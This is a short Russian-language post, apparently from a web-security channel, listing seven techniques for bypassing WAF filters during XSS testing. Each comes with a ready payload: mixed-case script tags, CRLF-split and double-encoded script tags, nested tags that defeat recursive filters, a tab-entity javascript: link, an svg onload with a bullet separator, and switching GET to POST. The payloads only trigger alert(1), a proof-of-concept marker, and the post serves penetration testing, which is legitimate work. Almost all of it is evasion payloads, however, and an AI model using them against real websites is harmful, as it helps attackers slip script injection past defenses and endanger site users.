​​📌 Методы обхода XSS фильтров



Вот список из 7 полезных методов, позволяющих обойти WAF (брандмауэр веб-приложений) при использовании XSS в веб-приложении:



▫️Проверьте, не блокирует ли брандмауэр только строчные буквы:

<sCRipT>alert(1)</sCRiPt>




▫️Попробуйте разбить регулярное выражение брандмауэра новой строкой "\r\n" (CRLF injection):

<script>%0d%0aalert(1)</script>




▫️Попробуйте двойное кодирование:

%253Cscript%253Ealert(1)%253C%252Fscript%253E




▫️Тестирование на рекурсивные фильтры, если брандмауэр удалит тэг <script>, у нас будет чистая полезная нагрузка:

<scr<script>ipt>alert(1);</scr</script>ipt>




▫️Инъекция анкор тега без пробелов:

<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">




▫️Попробуйте обойти пробелы с помощью маркера:

<svg•onload=alert(1)>




▫️Попробуйте изменить метод запроса (POST вместо GET):

 GET /?q=xss



POST /

q=xss



#web